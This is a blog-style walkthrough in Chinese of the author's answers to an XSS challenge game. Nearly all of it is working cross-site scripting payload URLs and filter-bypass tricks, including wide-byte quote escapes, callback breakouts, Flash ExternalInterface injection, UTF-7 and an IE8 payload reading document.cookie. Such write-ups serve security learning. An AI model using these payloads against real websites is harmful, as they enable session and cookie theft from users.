二哥的xss遊戲

斷斷續續作完了，收穫挺多的。

地址：http://xsst.sinaapp.com/xss/

 

二哥的xss遊戲

第一題
http://xsst.sinaapp.com/xss/ext/1.php?umod=commentsoutlet&act=count&siteid=3&libid=9%3Cimg%3Ea&dataid=1480&score=1%3Cimg%20src=1%20onerror=alert(1)%3Eaa&func=haoping&_=1353475261886

第二題
http://xsst.sinaapp.com/xss/ext/2.php?callback=wooyun=a}catch(err){alert(1)}//

第三題(1)
http://xsst.sinaapp.com/xss/ext/3.1.php?word=%22%20autofocus%20onfocus=alert(1);//

第三題(2) 限制:只能在ie8如下執行
http://xsst.sinaapp.com/xss/ext/3.2.php?c=follow%22%3E%3Coboi%3E&a=index%22%3E%3Coboi%3E&appkey=801004516%22%3E%3Coboi%3E&bg=ffffff;x:%20expression(open(alert(1)))&hsize=80%22%3E%3Coboi%3E&name=Zhanglifenft%22%3E%3Coboi%3E

第三題(3) 點擊go觸發
http://xsst.sinaapp.com/xss/ext/3.3.php?offset=a&searchtype_yjbg=yjjgasdasd&searchvalue_yjbg=wooyunaaaa%27;alert(1);//

第四題 寬字節gb18030 是 %c0%22 || %c0%5c 若是是GBK那就是%81%22
http://xsst.sinaapp.com/xss/ext/4.php?sid=ktqO7DjMQcJuAABQ&t=dm_loginpageaaa%c0%22;alert(1);//

第五題
http://xsst.sinaapp.com/xss/ext/5.php?vt=passport&ss=aa\&from==1;function/**/from(){};alert(1);//&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1

第六題 換行符（%0a）

http://xsst.sinaapp.com/xss/ext/6.php?libid=178&FilterAttrAND=3602&FilterValueAND=dotaaaa%0a%20alert(1);//

第七題

http://xsst.sinaapp.com/xss/ext/7.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=price%c0%22%0aalert(2);//

上面的是個人答案，下面是二哥的答案 都差很少
http://xsst.sinaapp.com/xss/ext/7.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=price%c0%5c%0aalert(1);//

第八題(1)

js轉義,利用(Xss測試字符串轉換工具)，裏面有unicode和base16
http://xsst.sinaapp.com/xss/ext/8.1.php?data=asa\u003ciframe%20onload=alert(1)\u003e

http://xsst.sinaapp.com/xss/ext/8.1.php?data=\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29\x3e

第八題(2)

http://xsst.sinaapp.com/xss/ext/8.2.php?libid=1&keyvalue=\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x32\x33\x29\x3e&attr=133&stype=2&tname=star_second.shtml

第九題(1) ie下觸發
http://xsst.sinaapp.com/xss/ext/9.1.htm?site=wooyun&name=%3Csvg/onload=alert(1)%3E&age=0

第九題(2)

http://xsst.sinaapp.com/xss/ext/9.2.htm?sid=%22%3E%3Csvg/onload=alert(1)%3E

第十題：

http://xsst.sinaapp.com/xss/ext/10.htm?alert(1);//=%E6%B8%B8%E6%88%8Fkkk

第十一題

http://xsst.sinaapp.com/xss/ext/11.htm?url=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+

第十二題

http://xsst.sinaapp.com/xss/ext/12.php?type=menu&np=11&pro=256&searchtype=2&cs=0010000&keyword=%26callback=alert(1);//PTAG=20058.13.13

第十三題：個人是在ie和火狐上觸發，根據二哥的答案(2)，因爲字符串在script標籤裏面，因此能夠用unicode編碼去繞過單引號的過濾。\u0027
(1)
http://xsst.sinaapp.com/xss/ext/13.php?receive=yes&mod=login&op=callback&referer=wooyun%22%3E%3Cscript%3Ealert(1);%3C/script%3E&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802
(2)
xsst.sinaapp.com/xss/ext/13.php?receive=yes&mod=login&op=callback&referer=wooyun\u0027;alert(1);//&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772&timestamp=1354305802

 

 

 

第十五題：http://xsst.sinaapp.com/xss/ext/15.swfupload.swf?movieName=aaa%22])}catch(e){alert(1)};//

this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady";
搜索flashReady_Callback 往下調用
ExternalCall.Simple(this.flashReady_Callback);
搜索Simple，發現以下調用，param1存在第一個參數裏，
ExternalInterface.call("函數名","參數1");
看作js裏面的 函數名("參數1");
而FLASH裏實際最後執行的JS代碼，形式以下（至於下面這句哪裏來的，暫時不表）： try { __flash__toXML(函數名("參數1")) ; } catch (e) { "<undefined/>"; } 於是 函數名 部分也能夠寫爲 (function(){alert("hi jack")}) 的形式。

public static function Simple(param1:String) : void
{
ExternalInterface.call(param1);
}

 

try { __flash__toXML(console.log("\\" ));alert(/XSS/);}catch(e){} //")) ; } catch (e) { "<undefined/>"; }

try { __flash__toXML(SWFUpload.instances[\" aa"])}catch(e){alert(1)}// \"].flashReady)) ; } catch (e) { "<undefined/>"; }

參考資料：http://www.cnblogs.com/kenkofox/p/3405395.html

第十六題(1):
http://xsst.sinaapp.com/xss/ext/16.1.swf?id=alert(1);\%22));open_flash_chart_data();}%20catch%20(e)%20{%20alert(1);%20}//

第十六題(2)配置一臺能被跨域請求的docker型的服務器

第十七題(1)
火狐,ie6,7 觸發，
http://xsst.sinaapp.com/xss/ext/17.php?game=roco&uin=%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E&world=5&roleid=44583443&level=8&role=me

第十七題(2)
ie6觸發,utf-7
http://xsst.sinaapp.com/xss/ext/utf-7.php?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-%20xsadas

第十七題(3)

ie8 觸發

http://xsst.sinaapp.com/xss/ext/ie8-bypass.php?t=test%22id=%3E%3Cdiv/id=x%3Ex%3C/div%3E%3Cxml:namespace%20prefix=t%3E%3Cimport%20namespace=t%20implementation=%23default%23time2%3E%3Ct:set/attributename=innerHTML%20targetElement=x%20to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;%3E

第十八題
答案已經被chrome過濾了
http://xsst.sinaapp.com/xss/ext/18.htm#siDomain=1&g_StyleID="><scv6/ript>alert(1)</script>
在ie6，7下觸發
http://xsst.sinaapp.com/xss/ext/18.htm#siDomain=1&g_StyleID="><script>alert(1)</script>

第十九題

http://xsst.sinaapp.com/xss/ext/19.php把名字改爲<svg/onload=alert(1)>發送語音時候點開連接觸發